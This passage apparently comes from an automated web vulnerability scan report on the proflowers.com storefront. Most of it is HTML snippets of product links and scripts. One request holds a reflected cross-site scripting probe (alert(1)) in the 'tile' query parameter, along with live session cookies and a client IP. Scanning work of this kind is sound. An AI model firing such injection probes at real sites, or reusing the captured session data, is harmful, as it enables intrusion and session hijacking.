"http://products.proflowers.com/chocolatestrawberry/12-Mothers-Day-Gift-Strawberries-30008960?viewpos=50&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Full Dozen Giant Dipped Mother&#39;s Day Berries " border="0" /></a>
...[SNIP]...
lick="exitMVTFreeVase=false" href="http://products.proflowers.com/chocolatestrawberry/12-Mothers-Day-Gift-Strawberries-30008960?viewpos=50&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Two-Days-for-Her-30002739?viewpos=51&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Days for Her" border="0" /></a>
...[SNIP]...
ls - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Two-Days-for-Her-30002739?viewpos=51&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ck="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/30-Tulips-for-Mom-3669?viewpos=52&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="30 Tulips for Mom" border="0" /></a>
...[SNIP]...
etails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/30-Tulips-for-Mom-3669?viewpos=52&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ase=false" href="http://products.proflowers.com/flowers/Deluxe-Two-Days-Just-for-Mom-30002825?viewpos=53&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Two Days Just for Mom" border="0" /></a>
...[SNIP]...
" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Two-Days-Just-for-Mom-30002825?viewpos=53&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/necklaces/family-necklace-30001190?viewpos=54&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="family necklace" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/necklaces/family-necklace-30001190?viewpos=54&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/A-Mothers-Dreams-30050116?viewpos=55&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="A Mother...s Dreams" border="0" /></a>
...[SNIP]...
ls - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/A-Mothers-Dreams-30050116?viewpos=55&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
e" href="http://products.proflowers.com/lilies/Deluxe-Fragrant-Stargazer-Lilies-for-Mom-41360?viewpos=56&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Fragrant Stargazer Lilies for Mom" border="0" /></a>
...[SNIP]...
="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Deluxe-Fragrant-Stargazer-Lilies-for-Mom-41360?viewpos=56&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=57&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Hugs and Kisses" border="0" /></a>
...[SNIP]...
- Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=57&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Deluxe-Lilies-for-Mom-40699?viewpos=58&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Lilies for Mom" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Deluxe-Lilies-for-Mom-40699?viewpos=58&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/Deluxe-Moms-Reward-41358?viewpos=59&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Mom&#39;s Reward" border="0" /></a>
...[SNIP]...
tails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/Deluxe-Moms-Reward-41358?viewpos=59&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
Vase=false" href="http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Spectacular-41214?viewpos=60&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Mother&#39;s Day Spectacular" border="0" /></a>
...[SNIP]...
w" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Spectacular-41214?viewpos=60&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ucts.proflowers.com/chocolatestrawberry/Full-Half-Dozen-Hand-Picked-Swizzled-Berries-30005170?viewpos=61&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Full Half Dozen Hand Picked Swizzled Berries" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/chocolatestrawberry/Full-Half-Dozen-Hand-Picked-Swizzled-Berries-30005170?viewpos=61&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunshine-of-My-Love-40824?viewpos=62&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sunshine of My Love" border="0" /></a>
...[SNIP]...
ls - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunshine-of-My-Love-40824?viewpos=62&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
href="http://products.proflowers.com/chocolate/Two-Full-Dozen-Hand-Picked-Fancy-Berries-9726?viewpos=63&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Full Dozen Hand Picked Fancy Berries" border="0" /></a>
...[SNIP]...
0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/chocolate/Two-Full-Dozen-Hand-Picked-Fancy-Berries-9726?viewpos=63&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/flowers/Country-Cottage-Garden-30008420?viewpos=64&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Victorian Rose Garden" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Country-Cottage-Garden-30008420?viewpos=64&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/monthlyflowers/3-Months-of-Flowers-2202?viewpos=65&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="3 Months of Flowers" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/monthlyflowers/3-Months-of-Flowers-2202?viewpos=65&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/monthlyflowers/6-Months-of-Flowers-2204?viewpos=66&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="6 Months of Flowers" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/monthlyflowers/6-Months-of-Flowers-2204?viewpos=66&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/monthlyflowers/12-Months-of-Flowers-2206?viewpos=67&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="12 Months of Flowers" border="0" /></a>
...[SNIP]...
y Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/monthlyflowers/12-Months-of-Flowers-2206?viewpos=67&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ck="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/100-Blooms-for-Mom-960?viewpos=68&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="100 Blooms for Mom" border="0" /></a>
...[SNIP]...
etails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/100-Blooms-for-Mom-960?viewpos=68&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/200-Blooms-for-Mom-11146?viewpos=69&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="200 Blooms for Mom" border="0" /></a>
...[SNIP]...
ails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/200-Blooms-for-Mom-11146?viewpos=69&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" border="0" /> </div>
...[SNIP]...
:emailInput" type="text" value="Enter Your Email Here" id="_ctl29_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
e freshest flowers, guaranteed to last at least 7 days." border="0" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a>
...[SNIP]...
ternational flower delivery" border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/international?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a><a title="Unique personalized gifts for life...s special occasions." border="0" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." 
border="0" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" onclick="exitMVTFreeVase=false" href="http://www.berries.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript><img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;"></noscript>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

16.32. http://www.proflowers.com/send-flowers-bsl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /send-flowers-bsl?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:17:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:17:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:23 GMT
Content-Length: 251606


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="canonical" href="http://www.proflowers.com/send-flowers-bsl"/>
